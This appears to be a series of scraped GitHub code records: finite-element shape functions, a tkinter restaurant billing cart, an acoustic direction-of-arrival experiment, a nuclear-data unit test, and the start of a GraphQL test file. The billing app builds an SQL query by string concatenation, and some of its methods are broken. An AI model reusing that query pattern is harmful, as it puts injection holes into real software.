eta = ref_point\n result=None\n if not (1<=node_num<=6):\n raise ValueError(\"Node Numbers are 1 to 6\")\n \n if not(0.<=xi<=1.) or not(0.<=eta<=1.) or (abs(xi)+abs(eta)>1.0):\n raise ValueError( \"Not inside reference triangle\")\n \n\n \n if node_num==1:\n result = (eta+xi-1.)*(2*eta+2*xi-1.) # correct\n \n \n if node_num==2:\n result = xi* (2*xi-1.) # correct\n \n \n if node_num==3:\n result = eta*(2*eta-1.) # correct\n \n \n if node_num==4:\n result = -4*xi*(eta+xi-1.) # correct\n \n \n if node_num==5:\n result = 4*eta*xi # correct\n \n \n if node_num==6:\n result = -4*eta*(eta+xi-1.) # correct\n \n return result\n\ndef shape_func_vec(ref_point):\n \"\"\"Returns the value of the specific shape function\n \n Input : xi, eta local coords must be inside a reference triangle with vertices \n (0,0), (1,0), (0,1)\n \n node_num the number of the node as per VTK element 22 numbered 1-6\n \n \"\"\"\n xi, eta = ref_point\n result=None\n \n if not(0.<=xi<=1.) or not(0.<=eta<=1.) or (abs(xi)+abs(eta)>1.0):\n raise ValueError( \"Not inside reference triangle\")\n \n\n result = np.zeros(6)\n result[0] = (eta+xi-1.)*(2*eta+2*xi-1.) # correct\n result[1] = xi* (2*xi-1.) # correct\n result[2] = eta*(2*eta-1.) # correct\n result[3] = -4*xi*(eta+xi-1.) # correct\n result[4] = 4*eta*xi # correct\n result[5] = -4*eta*(eta+xi-1.) # correct\n \n return result\n \ndef shape_func_deriv(ref_point, node:int, deriv_num):\n \"\"\"Returns the value of the derivative of the node shape function\n \n \n Input : xi, eta local coords must be inside a reference triangle with vertices \n (0,0), (1,0), (0,1)\n \n node_num the number of the node as per VTK element 22 numbered 1-6\n \n deriv_num : between 1,2 determines whether we are derivating by xi or eta\n \"\"\"\n \n node_num = node\n xi, eta = ref_point\n result=None\n if not (1<=node_num<=6):\n raise ValueError(\"Node Numbers are 1 to 6\")\n \n if not(0.<=xi<=1.) or not(0.<=eta<=1.) or (abs(xi)+abs(eta)>1.0):\n raise ValueError(\"Not inside reference triangle\")\n \n if deriv_num!=1 and deriv_num!=2:\n raise ValueError( \"Deriv_num must be one or two, not \"+str(deriv_num))\n \n \n if deriv_num==1:\n\n if node_num==1:\n result = (4*xi+4*eta-3.) # correct\n\n\n if node_num==2:\n result = (4*xi-1.) # correct\n\n\n if node_num==3:\n result = 0. # correct\n\n\n if node_num==4:\n result = -4*(2*xi+eta-1) # correct\n\n\n if node_num==5:\n result = 4*eta # correct\n\n\n if node_num==6:\n result = -4*eta # correct\n\n else:\n \n\n if node_num==1:\n result = (4*xi+4*eta-3.) # correct\n\n\n if node_num==2:\n result = 0. # correct\n\n\n if node_num==3:\n result = (4*eta-1.) # correct\n\n\n if node_num==4:\n result = -4*xi # correct\n\n\n if node_num==5:\n result = 4*xi # correct\n\n\n if node_num==6:\n result = -4*(xi+2*eta-1) # correct\n \n return result\n\ndef shape_func_deriv_vec(ref_point):\n \"\"\"Returns the value of the derivative of the node shape function\n \n \n Input : xi, eta local coords must be inside a reference triangle with vertices \n (0,0), (1,0), (0,1)\n \n node_num the number of the node as per VTK element 22 numbered 1-6\n \n deriv_num : between 1,2 determines whether we are derivating by xi or eta\n \"\"\"\n \n \n xi, eta = ref_point\n \n \n \n if not(0.<=xi<=1.) or not(0.<=eta<=1.) or (abs(xi)+abs(eta)>1.0):\n raise ValueError(\"Not inside reference triangle\")\n \n \n result = np.zeros(shape=(6,2))\n \n # xi deriv\n result[0,0] = (4*xi+4*eta-3.) # correct\n result[1,0] = (4*xi-1.) # correct\n result[2,0] = 0. # correct\n result[3,0] = -4*(2*xi+eta-1) # correct\n result[4,0] = 4*eta # correct\n result[5,0] = -4*eta # correct\n\n #eta deriv\n result[0,1] = (4*xi+4*eta-3.) # correct\n result[1,1] = 0. # correct\n result[2,1] = (4*eta-1.) # correct\n result[3,1] = -4*xi # correct\n result[4,1] = 4*xi # correct\n result[5,1] = -4*(xi+2*eta-1) # correct\n \n return result\n \ndef local_node_derivs(xi_eta, node_coords):\n \"\"\"Get gradient in local coords, not in reference for the purpose of building the stiffness matrix\n \n \"\"\"\n jac = jacobian(xi_eta, node_coords)\n if np.linalg.det(jac)!= 0:\n jacinv = np.linalg.inv(jac)\n else:\n print(node_coords)\n raise ValueError(\"Jacobian has zero determinant\")\n \n phi_derivs = shape_func_deriv_vec(xi_eta)\n phi_local_deriv = jacinv.dot(phi_derivs.transpose()) # 2x6 matrix\n \n \n return phi_local_deriv.transpose()\n \n \n\n\"\"\"\n---------------------------------------------------------------------------------\n| Mapping function stuff |\n---------------------------------------------------------------------------------\n\"\"\"\n\ndef map_to_local(xi_eta, coeffs):\n \"\"\"Map any reference element coords to the physical element\n \n Input: xi_eta: local coords must be inside a reference triangle with vertices \n (0,0), (1,0), (0,1)\n \n coeffs: numpy array with shape (6,2) where node_coords[0,0] is the \n x coord of the first node\n \n \n Output the x,y coords as numpy array\n \n \"\"\"\n xi, eta = xi_eta\n c1,c2,c3,c4,c5,c6 = coeffs\n res = (2*eta**2*(c1+c3-2*c6) + \n eta*xi*4*(c1-c4+c5-c6)+\n eta*(4*c6-3*c1-c3)+\n 2*xi**2*(c1+c2-2*c4)+\n xi*(4*c4-c2-3*c1)+\n c1)\n \n return res\n \n \ndef jacobian(xi_eta, node_coords):\n \"\"\"Returns the jacobian for the given xi_eta points\n \n Input: xi_eta: local coords must be inside a reference triangle with vertices \n (0,0), (1,0), (0,1)\n \n node_coords: numpy array with shape (6,2) where node_coords[0,0] is the \n x coord of the first node\n \n \"\"\"\n \n jac = np.zeros(shape=(2,2))\n for i in range(6):\n nx = shape_func_deriv(xi_eta, i+1, 1)\n ny = shape_func_deriv(xi_eta, i+1, 2)\n jac[0,0] += nx*node_coords[i,0]\n jac[0,1] += nx*node_coords[i,1]\n jac[1,0] += ny*node_coords[i,0]\n jac[1,1] += ny*node_coords[i,1]\n \n return jac\n \n\"\"\"\n---------------------------------------------------------------------------------\n| Buoyancy Calculations |\n---------------------------------------------------------------------------------\n\"\"\"\n\ndef local_forcing_el( el_node_coords:np.array, int_points:np.array):\n \"\"\"This is used to calculate the buoyancy. Will be multiplied later by\n the temperature and expansion coefficient.\n \n Input should be the coordinate of the element nodes (6),\n as well as the gaussian integration points, which should be in format\n (x, y, weight)\n \n Returns the integral of the shape functions over the element for the\n indicator function.\n \"\"\"\n \n\n npoints = int_points.shape[0]\n \n el_vec = np.zeros(6)\n for i in range(npoints):\n det = np.linalg.det(jacobian(int_points[i,:2], el_node_coords))\n el_vec += (shape_func_vec(int_points[i,:2])*int_points[i,-1] *det)\n if det<0.:\n print(\"Negative determinant in element!\" )\n return el_vec\n\n\n\n","repo_name":"marc-git/Navier-Stokes-Fourier-Boussinesq","sub_path":"P2FE.py","file_name":"P2FE.py","file_ext":"py","file_size_in_byte":8695,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"17061589268","text":"from tkinter import *\nfrom tkinter.ttk import *\nfrom connection import *\n\n\n\nclass addtocart:\n\n def priceClear(self):\n\n self.amountbox=Entry(self.frame3)\n self.gstbox=Entry(self.frame3)\n self.netamntbox=Entry(self.frame3)\n self.amountbox.grid(row=0,column=1)\n self.gstbox.grid(row=1,column=1)\n self.netamntbox.grid(row=2,column=1)\n\n\n # ''''''''''' FRAME 1'''''''\n\n def addMenuItem(self):\n cur = con.cursor()\n query = \"select * from menu \"\n\n cur.execute(query)\n self.data = cur.fetchall()\n print(self.data)\n\n\n self.combobox1 = []\n\n for i in self.data:\n print(i[1])\n print(self.combobox1)\n self.combobox1.append(i[1])\n\n\n print(self.combobox1)\n\n\n\n def quantity(self):\n self.menuQuantity=[]\n for i in range(1,11):\n self.menuQuantity.append(i)\n print(self.menuQuantity)\n\n\n\n def combobox1(self):\n\n self.serial = self.serial + 1\n self.addMenuItem()\n self.Qantity = self.combobox2.get()\n self.MenuNam = self.combobox1.get()\n print(\"Quantity:\" + self.Qantity)\n print(\"Price:\" + str(self.Price))\n self.totalPrice = (int(self.price) * int(self.Qantity))\n print(\"Total Price:\" + str(self.totalPrice))\n self.treeData = [self.SerialNum, self.MenuName, self.Price, self.Qantity, self.TotalPrice]\n self.row = self.row + 1\n self.treeview.insert(\"\", self.row, values=self.treeData)\n\n def priceCalculationBox(self):\n self.priceClear()\n\n self.amountbox['state'] = \"normal\"\n self.gstbox['state'] = \"normal\"\n self.netamntbox['state'] = \"normal\"\n\n\n self.amountbox.insert(0, self.totalAmtVar)\n self.gstbox.insert(0, self.gstAmtVar)\n self.netamntbox.insert(0, self.netAmtVar)\n self.amountbox['state'] = \"readonly\"\n self.gstbox['state'] = \"readonly\"\n self.netamntbox['state'] = \"readonly\"\n\n\n\n\n def fillTreeview(self):\n\n self.resetTreeview()\n\n for i in range(0, len(self.mainList)):\n self.treeview.insert(\"\", i, values=self.mainList[i])\n self.pricecalculation()\n self.priceCalculationBox()\n\n\n def pricecalculation(self):\n\n print(\"MAINLIST\")\n print(self.mainList)\n\n self.totalAmtVar=0\n for i in range(0,len(self.mainList)):\n\n self.totalAmtVar=self.mainList[i][4]+self.totalAmtVar\n\n print(\"Total Amount=\"+str(self.totalAmtVar))\n\n self.gstAmtVar=5*(0.01)\n self.netAmtVar=self.totalAmtVar+(self.totalAmtVar*self.gstAmtVar)\n print(\"Total Net:\"+str(self.netAmtVar))\n\n print(str(self.totalAmtVar))\n print(str(self.gstAmtVar))\n print(str(self.netAmtVar))\n print('Total Amount: ' + str(self.totalAmtVar) + \" \" + str(self.gstAmtVar) + \" \" + str(self.netAmtVar))\n\n\n\n\n\n\n\n\n def addCart(self):\n self.serial = self.serial + 1\n self.menuName=self.combobox1.get()\n cur=con.cursor()\n query='select * from menu where name=\"'+self.menuName +'\"'\n print(query)\n cur.execute(query)\n self.data=cur.fetchone()\n self.price=self.data[3]\n self.quantity=self.combobox2.get()\n self.totalPrice=(int(self.price)*int(self.quantity))\n\n print(\"SERIAL NUMBER:\"+str(self.serial)+\" Menu Name:\"+self.menuName+\"--Price:\"+str(self.price)+\"--Quantity:\"+str(self.quantity)+\"--Self.totalPrice\"+str(self.totalPrice))\n self.sublist=[self.serial,self.menuName,self.price,self.quantity,self.totalPrice]\n print(self.sublist)\n\n self.mainList.append(self.sublist)\n\n print(\"MAIN LIST:\")\n print(self.mainList)\n self.fillTreeview()\n\n\n\n\n\n\n def resetTreeview(self):\n\n for i in self.treeview.get_children():\n self.treeview.delete(i)\n\n\n # '''''''INSERT IN FRAME 3 PRICE CALCULATION''''\n\n\n\n def __init__(self):\n\n self.mainList=[]\n\n\n self.serial = 0\n self.row = 0\n self.window=Tk()\n self.frame1=PanedWindow()\n self.addMenuItem()\n self.quantity()\n self.slctname=Label(self.frame1,text=\"SELECT NAME\")\n self.combobox1=Combobox(self.frame1,value=self.combobox1,state=\"readonly\")\n\n\n\n\n\n self.slctquantity=Label(self.frame1,text=\"SELECT QUANTITY\")\n self.combobox2=Combobox(self.frame1,value=self.menuQuantity)\n\n\n\n self.addbttn=Button(self.frame1,text=\"ADD TO CART\",command=self.addCart)\n\n\n self.slctname.grid(row=0,column=0)\n self.combobox1.grid(row=0,column=1)\n\n\n self.slctquantity.grid(row=0,column=2)\n self.combobox2.grid(row=0,column=3)\n\n\n self.addbttn.grid(row=0,column=4)\n\n\n\n\n\n\n # '''''''''''''FRAME 2'''''\n\n self.frame2=PanedWindow()\n\n\n\n self.treeview=Treeview(self.frame2,column=(\"SerialNum\",\"MenuName\",\"Price\",\"Qantity\",\"TotalPrice\"))\n self.treeview.heading(\"SerialNum\",text=\"SERIAL NUMBER\")\n self.treeview.heading(\"MenuName\",text=\"MENU NAME\")\n self.treeview.heading(\"Price\",text=\"PRICE\")\n self.treeview.heading(\"Qantity\",text=\"QUANTITY\")\n self.treeview.heading(\"TotalPrice\",text=\"TOTAL PRICE\")\n\n self.treeview[\"show\"]=\"headings\"\n\n\n\n\n self.treeview.pack()\n\n\n\n\n\n\n # '''''''''''''FRAME 3'''''''''''''''''\n\n\n self.frame3=Tk()\n\n self.frame3=PanedWindow()\n\n self.totalAmnt=Label(self.frame3,text=\"TOTAL AMOUNT\")\n self.gst=Label(self.frame3,text=\"GST\")\n self.netAmnt=Label(self.frame3,text=\"NET AMOUNT\")\n\n\n\n\n\n\n self.totalAmnt.grid(row=0,column=0)\n self.gst.grid(row=1,column=0)\n self.netAmnt.grid(row=2,column=0)\n\n\n\n\n\n\n\n\n\n\n\n\n\n self.frame1.pack()\n self.frame2.pack()\n self.frame3.pack()\n self.window.mainloop()\n\nobj=addtocart()\n\n\n\n# self.t=StringVar()\n#\n# self.total=Label(self.frame3,textvariable=self.t)\n# self.t.set(\"hi\")\n#\n#\n#\n# self.g=StringVar()\n# self.gst=Label(self.frame3,textvariable=self.g)\n# self.g.set(\"hey\")\n#\n#\n#\n#\n# self.n=StringVar()\n# self.netamount=Label(self.frame3,textvariable=self.n)\n# self.n.set(\"hello\")\n#\n#\n#\n#\n#\n#\n#\n# self.gst=Label(self.frame3,text=\"GST\")\n#\n#\n# self.netamount=Label(self.frame3,text=\"NET AMOUNT\")\n","repo_name":"KangNavneet/RestaurantBilling","sub_path":"demoaddToCART.py","file_name":"demoaddToCART.py","file_ext":"py","file_size_in_byte":6342,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"5166355389","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Tue Mar 28 08:40:07 2023\r\n\r\n@author: Takahiro Iwami\r\n\"\"\"\r\n\r\n#################################################################\r\n# Experiment A\r\n#################################################################\r\n\r\n#================================================================\r\n# Import modules\r\n#================================================================\r\nimport matplotlib.pyplot as plt\r\nimport matplotlib.patches as pat\r\nfrom cycler import cycler\r\nimport numpy as np\r\nfrom scipy.special import jn\r\nimport time\r\n\r\n#================================================================\r\n# Definition of Functions\r\n#================================================================\r\ndef get_primary_field(c, k_lim, t, phi_vec, r):\r\n inner_prod = np.matmul(phi_vec, r.T)\r\n p = np.zeros([r.shape[0]], dtype=np.float64)\r\n for i in range(phi_vec.shape[0]):\r\n p += (k_lim[1]/np.pi)*np.sinc(k_lim[1]*(inner_prod[i]-c*t)/np.pi) - (k_lim[0]/np.pi)*np.sinc(k_lim[0]*(inner_prod[i]-c*t)/np.pi)\r\n return p\r\n\r\ndef RK(dim, k_max, r, r_p):\r\n dis = np.linalg.norm(r - r_p, axis=-1)\r\n dis[dis==0] += 1e-15\r\n return (k_max/(2*np.pi*dis))**(dim/2) * jn(dim/2, k_max*dis)\r\n\r\ndef K(dim, k_max, r1, r2):\r\n r = np.transpose(np.tile(r1, (r2.shape[0],1,1)), axes=(1,0,2))\r\n r_p = np.tile(r2, (r1.shape[0],1,1))\r\n return RK(dim, k_max, r, r_p)\r\n\r\ndef get_matrix_for_arrival_power_estimation(k_max, vartheta_vec, r, dim):\r\n r = np.transpose(np.tile(r, (r.shape[0],1,1)), axes=(1,0,2))\r\n r_p = np.transpose(r, axes=(1,0,2))\r\n diff = r - r_p\r\n return (2*k_max/(2*np.pi)**dim)*np.sinc(k_max*np.matmul(diff,vartheta_vec.T)/np.pi)\r\n\r\ndef add_noise(p, SNR=30):\r\n noise = np.random.rand(p.size)-0.5\r\n gain = np.sum(np.abs(p))/(10**(SNR/20)*np.sum(np.abs(noise)))\r\n tmp = noise.reshape(p.shape)*gain\r\n return p+tmp\r\n#================================================================\r\n# Main routine\r\n#================================================================\r\n\r\nif __name__ == \"__main__\":\r\n color_cycle = cycler(\"color\", ['lightgray', 'darkgray', 'black', 'lightgray', 'darkgray', 'black'])\r\n ls_cycle = cycler(\"linestyle\", ['-', '-', '-', '-.', '-.', '-.'])\r\n ms_cycle = cycler(\"markersize\", np.ones(6)*8)\r\n plt.rc('axes', prop_cycle=(color_cycle + ls_cycle + ms_cycle))\r\n \r\n np.random.seed(10) # fix seed\r\n dim = 2\r\n rho = 1.293\r\n kappa = 142.0e3\r\n c = np.sqrt(kappa/rho)\r\n f_c = np.array([250,1000,2000])\r\n f_low = f_c / np.sqrt(2)\r\n f_high = f_c * np.sqrt(2)\r\n k_min = 2*np.pi*f_low / c\r\n k_max = 2*np.pi*f_high / c\r\n k_lim = np.array([k_min, k_max]).T\r\n sl = 0.6 # length of each side\r\n # for MUSIC\r\n win = \"hann\"\r\n T = 2**8\r\n W = T//2+1\r\n fs = 8000\r\n t = np.arange(T)/fs\r\n t -= np.mean(t)\r\n \r\n # observation points\r\n div = 50\r\n int_num = div**2\r\n width = 0.02\r\n x_o, y_o= (np.mgrid[0:div:1, 0:div:1]+0.5) * width\r\n x_o = x_o - width*(div/2)\r\n y_o = y_o - width*(div/2)\r\n r_o = np.concatenate((x_o.reshape(div**2,1), y_o.reshape(div**2,1)), axis=1)\r\n disp_lim = np.array([np.min(x_o), np.max(x_o), np.min(y_o), np.max(y_o)])\r\n \r\n # sensor placement\r\n U = 100\r\n r_u = (np.random.rand(U, 2) - 0.5)*sl\r\n \r\n # directions of sound sources\r\n phi_deg = np.array([40, 110, 150])\r\n phi = np.deg2rad(phi_deg)\r\n phi_vec = -np.array([np.cos(phi), np.sin(phi)]).T\r\n \r\n # preprocessing\r\n lam = 0.1\r\n vartheta_num = 400\r\n vartheta_deg = np.linspace(0, 180, num=vartheta_num)\r\n vartheta = np.deg2rad(vartheta_deg)\r\n vartheta_vec = np.concatenate((np.cos(vartheta).reshape(vartheta_num,1), np.sin(vartheta).reshape(vartheta_num,1)), axis=1)\r\n\r\n # drawing\r\n p_pri = get_primary_field(c, k_lim[0], 0, phi_vec, r_o).reshape(div,div)\r\n p_pri /= np.max(np.abs(p_pri))\r\n fig1, ax1 = plt.subplots()\r\n ax1.tick_params(labelsize=24)\r\n ax1.set_xticks([-0.4, 0, 0.4])\r\n ax1.set_yticks([-0.4, 0, 0.4])\r\n im1 = ax1.imshow(p_pri.T, cmap=plt.cm.seismic, vmin=-1, vmax=1, interpolation='bicubic', origin='lower', extent=disp_lim)\r\n ax1.scatter(r_u[:,0], r_u[:,1], s=10, lw=0.2, c=\"black\", edgecolor=\"white\")\r\n rec = pat.Rectangle(xy = (-sl/2, -sl/2), width=sl, height=sl, angle=0, ec=\"gray\", fill=False, ls=\"--\", lw=1)\r\n ax1.add_patch(rec)\r\n ax1.set_xlabel(\"x [m]\", fontsize=24)\r\n ax1.set_ylabel(\"y [m]\", fontsize=24)\r\n \r\n p_pri = get_primary_field(c, k_lim[2], 0, phi_vec, r_o).reshape(div,div)\r\n p_pri /= np.max(np.abs(p_pri))\r\n fig2, ax2 = plt.subplots()\r\n ax2.tick_params(labelbottom=False, labelleft=False, labelright=False, labeltop=False)\r\n ax2.tick_params(bottom=False, left=False, right=False, top=False)\r\n im2 = ax2.imshow(p_pri.T, cmap=plt.cm.seismic, vmin=-1, vmax=1, interpolation='bicubic', origin='lower', extent=disp_lim)\r\n cb2 = fig2.colorbar(im2, ticks=[-1.0, -0.5, 0, 0.5, 1.0])\r\n cb2.ax.tick_params(labelsize=24)\r\n cb2.set_label(\"Sound pressure [Pa]\", fontname=\"Arial\", fontsize=24) \r\n ax2.scatter(r_u[:,0], r_u[:,1], s=10, lw=0.2, c=\"black\", edgecolor=\"white\")\r\n rec = pat.Rectangle(xy = (-sl/2, -sl/2), width=sl, height=sl, angle=0, ec=\"gray\", fill=False, ls=\"--\", lw=1)\r\n ax2.add_patch(rec)\r\n \r\n fig3, ax3 = plt.subplots(figsize=(16,9))\r\n ax3.vlines(phi_deg, 0, 1.05, color=\"dimgrey\", linestyles='-', label=\"True DOAs\")\r\n ax3.set_ylim(0, 1.05)\r\n ax3.set_xticks([0, 40, 90, 110, 150, 180])\r\n ax3.tick_params(labelsize=20)\r\n ax3.set_xlabel(\"Angle [deg]\", fontsize=20)\r\n ax3.set_ylabel(\"Normalized value\", fontsize=20)\r\n ax3.grid(ls=\"--\")\r\n\r\n # proposed method\r\n for f in range(f_c.shape[0]):\r\n K_inv = np.linalg.inv(K(dim, k_max[f], r_u, r_u) + lam*np.eye(r_u.shape[0]))\r\n C = np.einsum(\"ijk,jl->ilk\", np.einsum(\"ij,jkl->ikl\", K_inv.T, get_matrix_for_arrival_power_estimation(k_max[f], vartheta_vec, r_u, dim)), K_inv)\r\n p = get_primary_field(c, k_lim[f], 0, phi_vec, r_u)\r\n p = add_noise(p, SNR=30) \r\n start = time.time()\r\n P_p = np.matmul(np.matmul(C.T, p), p) # proposed method\r\n print(\"Proposed method\", time.time() - start)\r\n P_p -= np.min(P_p)\r\n P_p /= np.max(P_p)\r\n ax3.plot(vartheta_deg, P_p, lw=2, markevery=5, label=\"Proposed ({} Hz)\".format(f_c[f]))\r\n \r\n # MUSIC algorithm\r\n p = np.empty([T, U], dtype=np.float64)\r\n window = np.hanning(T)\r\n for f in range(f_c.shape[0]):\r\n index_range = np.array([int(np.ceil(2*f_low[f]*W/fs)), int(np.floor(2*f_high[f]*W/fs))])\r\n index_num = index_range[1] - index_range[0]\r\n for i in range(T):\r\n p[i] = get_primary_field(c, k_lim[f], t[i], phi_vec, r_u)\r\n p[i] = add_noise(p[i], SNR=30)\r\n start = time.time()\r\n p = p * np.tile(window.reshape(-1,1), (1,U))\r\n P = np.fft.rfft(p, axis=0)\r\n beta = np.zeros([index_num], dtype=np.float64)\r\n P_MU = np.empty([index_num, vartheta_num], dtype=np.float64)\r\n Rxx = np.einsum(\"ijk,ikl->ijl\", P[index_range[0]:index_range[1]].reshape(index_num,U,1), np.conjugate(P[index_range[0]:index_range[1]]).reshape(index_num,1,U)) / index_num\r\n for w in range(index_num):\r\n k = 2*np.pi*(fs*(w+index_range[0])/(2*W))/c\r\n u,s,v = np.linalg.svd(Rxx[w]) # singular value decomposition\r\n En = u[:,phi_deg.shape[0]:]\r\n beta[w] = np.sum(s[:phi.shape[0]])\r\n for i in range(vartheta_num):\r\n a = np.exp(1j*k*np.matmul(r_u, vartheta_vec[i]))\r\n P_MU[w,i] = np.real(np.matmul(np.conjugate(a), a)/(np.matmul(np.matmul(np.matmul(np.conjugate(a), En), np.conjugate(En.T)),a)))\r\n P_MU = np.sum(P_MU*np.tile(beta.reshape(-1,1), (1, vartheta_num)), axis=0)\r\n print(\"MUSIC\", time.time() - start)\r\n P_MU -= np.min(P_MU)\r\n P_MU /= np.max(P_MU)\r\n ax3.plot(vartheta_deg, P_MU, lw=2, markevery=5, label=\"MUSIC ({} Hz)\".format(f_c[f]))\r\n \r\n ax3.legend(loc='upper left', fontsize=15)\r\n \r\n plt.show()\r\n","repo_name":"Takahiro-Iwami/JASA2023_Half-Space_DOA","sub_path":"Experiment-A.py","file_name":"Experiment-A.py","file_ext":"py","file_size_in_byte":8185,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"26445543901","text":"import unittest\nimport actigamma as ag\n\n\n# Mock the database using a dummy loader\nclass MockLoader(object):\n def __enter__(self):\n \"\"\"\n Some dummy data\n \"\"\"\n return {\n \"H3\": {\n \"beta\": {\n \"lines\": {\n \"energies\": [18571.0, 45213.2],\n \"energies_unc\": [6.0, 5.0],\n \"intensities\": [1.0, 0.8],\n \"intensities_unc\": [0.0, 0.0],\n \"norms\": [1.0, 1.0],\n \"norms_unc\": [0.0, 0.0],\n },\n \"mean_energy\": 5707.4,\n \"mean_energy_unc\": 1.84397,\n \"mean_normalisation\": 1.0,\n \"mean_normalisation_unc\": 0.0,\n \"number\": 2,\n },\n \"gamma\": {\n \"lines\": {\n \"energies\": [3571.0],\n \"energies_unc\": [2.0],\n \"intensities\": [1.0],\n \"intensities_unc\": [0.0],\n \"norms\": [1.0],\n \"norms_unc\": [0.0],\n },\n \"mean_energy\": 307.4,\n \"mean_energy_unc\": 1.84397,\n \"mean_normalisation\": 1.0,\n \"mean_normalisation_unc\": 0.0,\n \"number\": 1,\n },\n \"SF\": {},\n \"halflife\": 389105000.0,\n \"zai\": 10030,\n },\n \"Li8\": {\n \"alpha\": {\n \"lines\": {\n \"energies\": [1566000.0],\n \"energies_unc\": [30000.0],\n \"intensities\": [1.0],\n \"intensities_unc\": [0.0],\n \"norms\": [1.0],\n \"norms_unc\": [0.0001],\n },\n \"mean_energy\": 3125250.0,\n \"mean_energy_unc\": 30000.4,\n \"mean_normalisation\": 1.0,\n \"mean_normalisation_unc\": 0.0001,\n \"number\": 1,\n },\n \"beta\": {\n \"lines\": {\n \"energies\": [28571.0],\n \"energies_unc\": [30000.0],\n \"intensities\": [1.0],\n \"intensities_unc\": [0.0],\n \"norms\": [1.0],\n \"norms_unc\": [0.0001],\n },\n \"mean_energy\": 6204620.0,\n \"mean_energy_unc\": 14446.8,\n \"mean_normalisation\": 1.0,\n \"mean_normalisation_unc\": 0.0001,\n \"number\": 1,\n },\n \"halflife\": 0.838,\n \"zai\": 30080,\n },\n }\n\n def __exit__(self, *args):\n \"\"\"\n Does nothing\n \"\"\"\n pass\n\n\nclass DatabaseInventoryUnitTest(unittest.TestCase):\n def setUp(self):\n self.db = ag.DefaultDatabase(datasource=MockLoader())\n\n def test_nuclides(self):\n self.assertEqual(\n [\"H3\", \"Li8\"], sorted(self.db.allnuclides), \"Assert all nuclides\"\n )\n self.assertEqual(\n [\"H3\"],\n self.db.allnuclidesoftype(spectype=\"gamma\"),\n \"Assert all nuclides of gamma type\",\n )\n self.assertEqual(\n [\"Li8\"],\n self.db.allnuclidesoftype(spectype=\"alpha\"),\n \"Assert all nuclides of alpha type\",\n )\n self.assertEqual(\n [\"H3\", \"Li8\"],\n sorted(self.db.allnuclidesoftype(spectype=\"beta\")),\n \"Assert all nuclides of beta type\",\n )\n self.assertEqual(True, \"H3\" in self.db, \"Assert H3 in database\")\n self.assertEqual(True, \"Li8\" in self.db, \"Assert Li8 in database\")\n self.assertEqual(False, \"h3\" in self.db, \"Assert h3 not in database\")\n self.assertEqual(False, \"h 3\" in self.db, \"Assert h 3 not in database\")\n self.assertEqual(False, \"U235\" in self.db, \"Assert U235 not in database\")\n\n def test_types(self):\n self.assertEqual(\n sorted([\"gamma\", \"alpha\", \"beta\", \"SF\"]),\n self.db.alltypes,\n \"Assert all types\",\n )\n self.assertEqual(\n sorted([\"gamma\", \"beta\", \"SF\"]), self.db.gettypes(\"H3\"), \"Assert all types\"\n )\n\n def test_zai(self):\n self.assertEqual(10030, self.db.getzai(\"H3\"), \"Assert ZAI H3\")\n self.assertEqual(30080, self.db.getzai(\"Li8\"), \"Assert ZAI Li8\")\n\n def test_name(self):\n self.assertEqual(\"H3\", self.db.getname(10030), \"Assert name H3\")\n self.assertEqual(\"Li8\", self.db.getname(30080), \"Assert name Li8\")\n\n def test_halflife(self):\n self.assertEqual(389105000.0, self.db.gethalflife(\"H3\"), \"Assert halflife H3\")\n self.assertEqual(0.838, self.db.gethalflife(\"Li8\"), \"Assert halflife Li8\")\n\n def test_linedata(self):\n self.assertEqual(\n [3571.0], self.db.getenergies(\"H3\").tolist(), \"Assert gamma energies H3\"\n )\n self.assertEqual(\n [1.0], self.db.getintensities(\"H3\").tolist(), \"Assert gamma intensities H3\"\n )\n self.assertEqual(\n [18571.0, 45213.2],\n self.db.getenergies(\"H3\", spectype=\"beta\").tolist(),\n \"Assert beta energies H3\",\n )\n self.assertEqual(\n [1.0, 0.8],\n self.db.getintensities(\"H3\", spectype=\"beta\").tolist(),\n \"Assert beta intensities H3\",\n )\n self.assertEqual(\n [28571],\n self.db.getenergies(\"Li8\", spectype=\"beta\").tolist(),\n \"Assert beta energies Li8\",\n )\n self.assertEqual(\n [1.0],\n self.db.getintensities(\"Li8\", spectype=\"beta\").tolist(),\n \"Assert beta intensities Li8\",\n )\n\n def test_sortedlines(self):\n alphas = ag.sortedlines(self.db, spectype=\"alpha\")\n betas = ag.sortedlines(self.db, spectype=\"beta\")\n gammas = ag.sortedlines(self.db, spectype=\"gamma\")\n nonsense = ag.sortedlines(self.db, spectype=\"dsad\")\n\n self.assertEqual(alphas, [(\"Li8\", 1566000.0)], \"Assert sorted alphas\")\n self.assertEqual(\n betas,\n [(\"H3\", 18571.0), (\"Li8\", 28571.0), (\"H3\", 45213.2)],\n \"Assert sorted betas\",\n )\n self.assertEqual(gammas, [(\"H3\", 3571.0)], \"Assert sorted gammas\")\n self.assertEqual(nonsense, [], \"Assert sorted nonsense\")\n\n def test_make_inventory_from_atoms(self):\n h3_atoms = 13452334\n li8_atoms = 9876543\n h3_activity = ag.atoms_from_activity(self.db, \"H3\", h3_atoms)\n li8_activity = ag.atoms_from_activity(self.db, \"Li8\", li8_atoms)\n\n inv = ag.make_inventory_from_atoms(\n self.db,\n {self.db.getzai(\"H3\"): h3_atoms, self.db.getzai(\"Li8\"): li8_atoms},\n )\n\n self.assertEqual(inv[0], (10030, h3_activity))\n self.assertEqual(inv[1], (30080, li8_activity))\n","repo_name":"fispact/actigamma","sub_path":"tests/databasetest.py","file_name":"databasetest.py","file_ext":"py","file_size_in_byte":7093,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"3"} +{"seq_id":"35592036335","text":"import asyncio\nimport json\nimport logging\nimport time\nimport shortuuid\nimport uvicorn\nimport pytest\nimport freezegun\nimport ariadne.asgi\nimport jwt\nfrom typing import Optional, List\nfrom multiprocessing import Process\nfrom gql import Client, gql\nfrom gql.transport.aiohttp import AIOHTTPTransport\n\nimport serializing\nimport config\nimport storage\nfrom loggers import get_logger\nfrom model import *\nimport schema as schema_factory\nimport test\n\nlog = get_logger(\"dimsum\")\nsession_key = \"asdfasdf\"\n\n\n@pytest.fixture(scope=\"function\")\ndef silence_aihttp(caplog):\n caplog.set_level(logging.CRITICAL, \"gql.transport.aiohttp\")\n yield\n\n\ndef 